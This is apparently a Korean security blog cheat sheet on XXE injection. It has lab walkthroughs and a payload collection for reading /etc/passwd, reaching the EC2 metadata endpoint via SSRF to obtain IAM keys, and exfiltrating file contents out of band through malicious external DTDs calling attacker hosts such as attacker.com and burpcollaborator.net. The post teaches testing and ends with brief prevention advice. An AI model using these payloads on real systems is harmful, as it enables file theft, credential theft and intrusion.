Search
XML Injection
9 min read

XML Injection

UseeGod's Picture
UseeGod in CheatSheet

๐Ÿ”Ž What is XML(XXE)?

XML์€ "ํ™•์žฅ ๊ฐ€๋Šฅํ•œ ๋งˆํฌ์—… ์–ธ์–ด"๋กœ ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๊ณ  ์ „์†กํ•˜๊ธฐ ์œ„ํ•ด ์„ค๊ณ„๋œ ์–ธ์–ด์ž…๋‹ˆ๋‹ค.
HTML๊ณผ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ XML์€ ํƒœ๊ทธ์™€ ํŠธ๋ฆฌ๊ตฌ์กฐ๋ฅผ ์‚ฌ์šฉํ•˜์ง€๋งŒ HTML๊ณผ ๋‹ฌ๋ฆฌ XML์€ ๋ฏธ๋ฆฌ ์ •์˜๋œ ํƒœ๊ทธ๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š์œผ๋ฏ€๋กœ ํƒœ๊ทธ์— ๋ฐ์ดํ„ฐ๋ฅผ ์„ค๋ช…ํ•˜๋Š” ์ด๋ฆ„์„ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ํ˜„์žฌ๋Š” JSON ํ˜•์‹์„ ์„ ํ˜ธํ•˜์—ฌ ์‚ฌ์šฉ๋นˆ๋„๊ฐ€ ์ค„์–ด๋“ค๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

XML entities๋Š” ๋ฐ์ดํ„ฐ ์ž์ฒด๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๋Œ€์‹  XML ๋ฌธ์„œ ๋‚ด์—์„œ ๋ฐ์ดํ„ฐ ํ•ญ๋ชฉ์„ ๋‚˜ํƒ€๋‚ด๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

&lt; = <
&gt; = >

XML custom entities๋Š” XML์„ ์‚ฌ์šฉํ•˜๋ฉด DTD(document type definition)๋‚ด์—์„œ ์‚ฌ์šฉ์ž ์ง€์ • ์—”ํ‹ฐํ‹ฐ๋ฅผ ์ •์˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
&myentity; ๋Š” ๋ฌธ์„œ ๋‚ด์—์„œ ๋ชจ๋“  ์‚ฌ์šฉ์ด ์ •์˜๋œ ๊ฐ’ my entitiy value ๋กœ ๋Œ€์ฒด๋จ์„ ์˜๋ฏธ

XML external entities๋Š” ์ •์˜๊ฐ€ ์„ ์–ธ๋œ DTD ์™ธ๋ถ€์— ์žˆ๋Š” ์‚ฌ์šฉ์ž ์ง€์ • ์—”ํ‹ฐํ‹ฐ ์œ ํ˜•์ž…๋‹ˆ๋‹ค.
์™ธ๋ถ€ ์—”ํ‹ฐํ‹ฐ์˜ ์„ ์–ธ์€ SYSTEM ํ‚ค์›Œ๋“œ๋ฅผ ์‚ฌ์šฉํ•˜๋ฉฐ ์—”ํ‹ฐํ‹ฐ ๊ฐ’์„ ๋กœ๋“œํ•ด์•ผ ํ•˜๋Š” URL ์„ ์ง€์ •ํ•ด์•ผํ•ฉ๋‹ˆ๋‹ค.
URL์€ file:// ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ ํŒŒ์ผ์—์„œ ์™ธ๋ถ€ ์—”ํ‹ฐํ‹ฐ๋ฅผ ๋กœ๋“œํ•  ์ˆ˜ ๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>
file://ํ”„๋กœํ† ์ฝœ ์‚ฌ์šฉ ํŒŒ์ผ์—์„œ ์™ธ๋ถ€ ์—”ํ‹ฐํ‹ฐ ๋กœ๋“œ
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>

๐Ÿ”Ž What is XML(XXE) injection?

XML ๋ฌธ์„œ์—์„œ External Entities๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•˜๋Š” ์™ธ๋ถ€ URL์„ ์‹คํ–‰์‹œ์ผœ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.
XMLํŽ˜์ด๋กœ๋“œ๋ฅผ ์„œ๋ฒ„๋กœ ๋ณด๋‚ผ๋•Œ ํ—ค๋”์— Content-Type: application/xml ์„ค์ •ํ•˜๋Š” ๊ฒƒ์ด ๋„์›€์ด ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-21 แ„‹แ…ฉแ„’แ…ฎ 10 23 29

LAB

Exploiting XXE using external entities to retrieve files

๋ฌผํ’ˆ์˜ ์žฌ๊ณ ํŒŒ์•… ๋ฒ„ํŠผ์„ ํด๋ฆญ ์‹œ XML์„ ์‚ฌ์šฉํ•˜์—ฌ ์š”์ฒญํ•  ๋•Œ ์™ธ๋ถ€ ์—”ํ‹ฐํ‹ฐ๋ฅผ ์ •์˜ํ•˜์—ฌ passwd ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ์˜ค๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-21 แ„‹แ…ฉแ„’แ…ฎ 10 40 11

XXE๊ณต๊ฒฉ์— ๋Œ€ํ•œ ํŠน๋ณ„ํ•œ ๋ฐฉ์–ด๋ฅผ ์ˆ˜ํ–‰ํ•˜์ง€ ์•Š์„๊ฒฝ์šฐ XXE์ทจ์•ฝ์ ์„ ์‚ฌ์šฉํ•˜์—ฌ /etc/paswd ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ์˜ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
์‘๋‹ต๊ฐ’์— ์ถœ๋ ฅ๋˜์ง€ ์•Š๋Š”๊ฒฝ์šฐ๊ฐ€ ์žˆ์œผ๋‹ˆ ํžˆ์Šคํ† ๋ฆฌ์—์„œ ๊ผญ ํ™•์ธํ•ด ๋ณผ๊ฒƒ

//๊ธฐ์กด์ฝ”๋“œ
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>2</productId>
<storeId>1</storeId>
</stockCheck>

//๊ณต๊ฒฉ ์ฝ”๋“œ
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-21 แ„‹แ…ฉแ„’แ…ฎ 10 43 45

Exploiting XXE to perform SSRF attacks

XXE ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ SSRF ๊ณต๊ฒฉ์œผ๋กœ DTD์˜ URL์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ์—…๋ฐ์ดํŠธํ•˜์—ฌ API๋ฅผ ํƒ์ƒ‰ํ•˜์—ฌ ์‹œํฌ๋ฆฟ ํ‚ค๊ฐ€ ํฌํ•จ๋œ JSON์„ ๋ฐ˜ํ™˜ํ•˜๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.

SSRF ๊ณต๊ฒฉ์ฝ”๋“œ ๋Œ€์ž…์‹œ ์œ ํšจํ•˜์ง€ ์•Š์€ Product ID ๊ฐ€ ๋‚˜์˜ค๋ฉด์„œ latest๊ฐ€ ๋ฐ˜ํ™˜๋˜๋Š”๋ฐ ์ด๋ฅผ URL์— ์ถ”๊ฐ€ํ•˜์—ฌ ์ค๋‹ˆ๋‹ค.

//SSRF ๊ณต๊ฒฉ์ฝ”๋“œ
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-22 แ„‹แ…ฉแ„’แ…ฎ 10 48 05

EC2 Metadata endpoint๋ฅผ ๊ธฐ๋ณธ URL์ธ http://169.254.169.254/์˜ ๋์ ์— ๋‚˜์˜จ latest ์ถ”๊ฐ€ ์‹œ /meta-data ๊ฐ€ ๋‚˜์˜ค๋Š”๋ฐ ์ด๋„ ๊ณ„์† ํ•˜์—ฌ URL์— ์ถ”๊ฐ€ํ•˜์—ฌ ์ค๋‹ˆ๋‹ค

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-22 แ„‹แ…ฉแ„’แ…ฎ 10 48 16

๋๊นŒ์ง€ ํ•˜๋‹ค๋ณด๋ฉด adminํŽ˜์ด์ง€๊ฐ€ ๋‚˜์˜ค๊ณ  EC2 Metadata endpoint ์„œ๋ฒ„์˜ IAM ๋ณด์•ˆ ์•ก์„ธ์Šค ํ‚ค๋ฅผ ์–ป๋Š” SSRF ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-22 แ„‹แ…ฉแ„’แ…ฎ 10 48 46

Blind XXE with out-of-band interaction

๋ธ”๋ผ์ธ๋“œ XXE ์ทจ์•ฝ์ ์€ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด XXE์ธ์ ์…˜์— ์ทจ์•ฝํ•˜์ง€๋งŒ ์‘๋‹ต ๋‚ด์—์„œ ์ •์˜๋œ ์™ธ๋ถ€ ์—”ํ‹ฐํ‹ฐ ๊ฐ’์„ ๋ฐ˜ํ™˜ํ•˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿด ๊ฒฝ์šฐ Burp pro ๋ฒ„์ „์—์„œ ์‚ฌ์šฉ๊ฐ€๋Šฅํ•œ testBurp Collaborator client</span>๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋Œ€์—ญ์™ธ ๊ณต๊ฒฉ(Out-of-band)์œผ๋กœ ๊ฒฐ๊ณผ๊ฐ’์„ ๋ฐ›์•„๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

XML์„ ์‚ฌ์šฉํ•˜์—ฌ ์žฌ๊ณ ํŒŒ์•…์„ ์ง„ํ–‰ํ•˜๊ณ ์žˆ์ง€๋งŒ XML ์ธ์ ์…˜ ์ฝ”๋“œ๋ฅผ ์ž…๋ ฅํ•˜์˜€์„ ๋•Œ ๊ฒฐ๊ณผ๊ฐ’์„ ๋ฐ›์•„ ๋ณผ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

xxe1

๊ฒฐ๊ณผ๊ฐ’์„ ํ™•์ธํ•  ์ˆ˜ ์—†์„๋•Œ Burp Collaborator client๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฒ„ํ”„ ์ฃผ์†Œ๋ฅผ ๋„ฃ์–ด์ฃผ๋ฉด ๊ฒฐ๊ณผ ์‘๋‹ต๊ฐ’์„ ํ™•์ธ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

xxe2 xxe3

Blind XXE with out-of-band interaction via XML parameter entities

์ผ๋ถ€ ์ž…๋ ฅ ์œ ํšจ์„ฑ ๊ฒ€์‚ฌ ๋˜๋Š” ์‚ฌ์šฉ์ค‘์ธ XMLํŒŒ์„œ์˜ ๊ฐ•ํ™”๋กœ ์ธํ•ด ์ผ๋ฐ˜ ์—”ํ‹ฐํ‹ฐ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ XXE ๊ณต๊ฒฉ์ด ๋จนํžˆ์ง€ ์•Š์„๋–„๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค.
์ด๋Ÿด๋•Œ๋Š” XML ๋งค๊ฐœ ๋ณ€์ˆ˜ ์—”ํ‹ฐํ‹ฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์šฐํšŒ๋ฅผ ์ง„ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. XML ๋งค๊ฐœ๋ณ€์ˆ˜ ์—”ํ‹ฐํ‹ฐ๋Š” DTD ๋‚ด์˜ ๋‹ค๋ฅธ ๊ณณ์—์„œ๋งŒ ์ฐธ์กฐํ•  ์ˆ˜ ์žˆ๋Š” ํŠน์ˆ˜ํ•œ ์ข…๋ฅ˜์˜ XML ์—”ํ‹ฐํ‹ฐ์ž…๋‹ˆ๋‹ค.

//๋งค๊ฐœ๋ณ€์ˆ˜ ์—”ํ‹ฐํ‹ฐ ์ •์˜ ๋ฐฉ๋ฒ•
<!ENTITY % myparameterentity "my parameter entity value" >

// ๋งค๊ฐœ๋ณ€์ˆ˜ ์—”ํ‹ฐํ‹ฐ๋ฅผ ํ†ตํ•ด ๋ธ”๋ผ์ธ๋“œ XXE ํ…Œ์ŠคํŠธ
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>

Burp Collaborator client๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ฐ˜ํ™˜๋˜์ง€ ์•Š๋Š” ๊ฒฐ๊ณผ๊ฐ’์„ ํ™•์ธ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

xxe1 xxe2

Exploiting blind XXE to exfiltrate data using a malicious external DTD

๋Œ€์—ญ์™ธ ๊ณต๊ฒฉ(OOB)๋ฅผ ํ†ตํ•ด Blind XXE ์ทจ์•ฝ์ ์„ ํƒ์ง€ํ•˜๊ณ  ์–ด๋–ป๊ฒŒ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š”์ง€์— ๋Œ€ํ•œ ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.
์™ธ๋ถ€์— ์ž‘์„ฑํ•ด๋‘” ์•…์„ฑ DTD๋ฅผ ์ด์šฉํ•˜์—ฌ XXE ํŽ˜์ด๋กœ๋“œ์— ์™ธ๋ถ€ DTD๋ฅผ ํ˜ธ์ถœํ•˜์—ฌ ์ค‘์š”์ •๋ณด๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์™ธ๋ถ€์— ๋‹ค์Œ๊ณผ ๊ฐ™์€ DTDํŒŒ์ผ์„ ์ž‘์„ฑํ•ด ๋‘ก๋‹ˆ๋‹ค.

//URL ์ฃผ์†Œ = Burp Collaborator ์ฃผ์†Œ
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://f1hjrzeua66ijp8bi06rrkbeh5nvbk.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;

xxe2

XXE Injection์„ ํ†ตํ•ด ๋ฏธ๋ฆฌ ์ƒ์„ฑํ•ด๋‘” URL ์ฃผ์†Œ๋ฅผ ๋ถˆ๋Ÿฌ์˜ค๋ฉด ๋ฏธ๋ฆฌ ์ž‘์„ฑํ•ด๋‘” ๊ณต๊ฒฉ ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์‹คํ–‰๋˜๋ฉฐ hostname์„ ๋ถˆ๋Ÿฌ์˜ต๋‹ˆ๋‹ค.

xxe3 xxe4

Exploiting XInclude to retrieve files

XML๋ฌธ์„œ๋ฅผ ์ œ์–ดํ•  ์ˆ˜ ์—†์–ด DOCTYPE ์ˆ˜์ •์ด ๋ถˆ๊ฐ€๋Šฅํ• ๋•Œ XInclude๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

xxe1

Exploiting blind XXE to retrieve data via error messages

๋ธ”๋ผ์ธ๋“œ XXE ์ธ์ ์…˜์„ ํ†ตํ•ด ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ๊ฐ€ ํฌํ•จ๋œ XML ์˜ค๋ฅ˜๋ฉ”์‹œ์ง€๋ฅผ ์ž…๋ ฅํ•˜์—ฌ ํ˜ธ์ถœํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

exploit.dtd ํŒŒ์ผ ์ƒ์„ฑ (file:///invalid/%file ์„ ํ†ตํ•ด ์—๋Ÿฌ๊ตฌ๋ฌธ ์ž…๋ ฅ)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

xxe1

์ƒ์„ฑํ•œ exploit.dtd ํ˜ธ์ถœ ์‹œ /etc/passwd ํŒŒ์ผ ํ˜ธ์ถœ

xxe2

Exploiting XXE to retrieve data by repurposing a local DTD

์™ธ๋ถ€ DTD๋ฅผ ๋ถˆ๋Ÿฌ์˜ฌ ์ˆ˜ ์—†์„๋–„ ๋‚ด๋ถ€ DTD๋ฅผ ์ด์šฉํ•˜๋Š” ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.
๋ฌธ์„œ์˜ DTD๊ฐ€ ๋‚ด๋ถ€ ๋ฐ ์™ธ๋ถ€ DTD๋ฅผ ํ˜ผํ•ฉ์œผ๋กœ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ ๋‚ด๋ถ€ DTD์—์„œ ์™ธ๋ถ€ DTD์— ์„ ์–ธ๋œ ์—”ํ‹ฐํ‹ฐ๋ฅผ ์žฌ์ •์˜ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ๊ฐ€ ํฌํ•จ๋œ ์˜ค๋ฅ˜ ๋ฉ”์‹œ์ง€๋ฅผ ํŠธ๋ฆฌ๊ฑฐ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

GNOME ํ™˜๊ฒฝ(์šฐ๋ถ„ํˆฌ,ํŽ˜๋„๋ผ,๋ฐ๋น„์•ˆ,๋ ˆ๋“œํ—ท,์„ผํŠธOS ๋“ฑ ๋ฐ์Šคํฌํ†ฑ ํ™˜๊ฒฝGUI ์‹œ์Šคํ…œ)์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ ๋ฆฌ๋ˆ…์Šค๋Š” /usr/share/yelp/dtd/docbookx.dtd ์— dtdํŒŒ์ผ์ด ์œ„์น˜ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.
์ด๋ฅผ ํ™œ์˜ํ•˜์—ฌ ํŒŒ์ผ์ด ์žˆ๋Š”์ง€ ์—ฌ๋ถ€๋ฅผ ํ…Œ์ŠคํŠธ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

//docbookx ๊ฐ€ ์•„๋‹Œ docbook ๋ฅผ ์ „์†กํ•˜์˜€์„๋•Œ ์—๋Ÿฌ๋ฐœ์ƒ
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbook.dtd">
%local_dtd;
]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

xxe1

local DTD ํŽ˜์ด๋กœ๋“œ ์ž…๋ ฅ

//docbookx ๊ฐ€ ์•„๋‹Œ docbook ๋ฅผ ์ „์†กํ•˜์˜€์„๋•Œ ์—๋Ÿฌ๋ฐœ์ƒ
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbook.dtd">
%local_dtd;
]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

xxe2


๐Ÿ Cheat sheet

  • Classic XXE (/etc/passwd)
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
  • Classic XXE Base64 encoded(/etc/passwd)
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
  • PHP Wrapper inside XXE
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
  <contact>
    <name>Jean &xxe; Dupont</name>
    <phone>00 11 22 33 44</phone>
    <address>42 rue du CTF</address>
    <zipcode>75000</zipcode>
    <city>Paris</city>
  </contact>
</contacts>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
  • XInclude attacks
//When you can't modify the DOCTYPE element use the XInclude to target
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
  • Exploiting XXE to perform SSRF attacks
//XXE can be combined with the SSRF vulnerability to target another service on the network.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
]>
<foo>&xxe;</foo>
  • Error Based XXE
//Payload to trigger the XXE
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>
<message></message>

//Contents of ext.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

  • Exploiting blind XXE to exfiltrate data out-of-band

  • Blind XXE
//The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
]>
<r></r>

//Send the content of /etc/passwd to "www.malicious.com", you may receive only the first line.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>
  • XXE OOB Attack (Yunusov, 2013)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;
  • XXE with local DTD
//In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net'>]>
<root>&test;</root>

//If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename.
<!DOCTYPE root [
    <!ENTITY % local_dtd SYSTEM "file:///abcxyz/">

    %local_dtd;
]>
<root></root>

//Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message.
<!DOCTYPE root [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

    <!ENTITY % ISOamsa '
        <!ENTITY &#x25; file SYSTEM "file:///REPLACE_WITH_FILENAME_TO_READ">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        '>

    %local_dtd;
]>
<root></root>

๐Ÿ‘€ How to Prevent ?

  • ์™ธ๋ถ€ Entity (DTDs) ๊ธฐ๋Šฅ ๋น„ํ™œ์„ฑํ™”
  • XML Entity ๊ธฐ๋Šฅ ํ•„์š” ์‹œ ์ž…๋ ฅ ๊ฐ’ ๊ฒ€์ฆ์„ ํ†ตํ•ด ๋ถˆํ•„์š”ํ•œ ํŠน์ˆ˜๋ฌธ์ž ํ•„ํ„ฐ๋ง ํ•„์š”

๐Ÿ“ƒ References

You may also like

IP ๋Œ€์—ญ ๋ถ„ํ•  ํ‘œ
2 min read

IP ๋Œ€์—ญ ๋ถ„ํ•  ํ‘œ

UseeGod's Picture
UseeGod in CheatSheet
Bypass NAC
1 min read

Bypass NAC

UseeGod's Picture
UseeGod in CheatSheet
AWS Cheat Sheet
3 min read

AWS Cheat Sheet

AWS Cloud

UseeGod's Picture
UseeGod in CheatSheet Cloud

Latest Posts

Web3 ์ž๋ฃŒ ๋ชจ์Œ
1 min read

Web3 ์ž๋ฃŒ ๋ชจ์Œ

UseeGod's Picture
UseeGod
ํ† ํฐ๊ธฐ๋ฐ˜ ์ธ์ฆ์—์„œ bearer ๋ž€?
2 min read

ํ† ํฐ๊ธฐ๋ฐ˜ ์ธ์ฆ์—์„œ bearer ๋ž€?

UseeGod's Picture
UseeGod

Explore Tags

Android BugBounty CVE CheatSheet Cloud Error Git HTB IOS Reversing Web Web3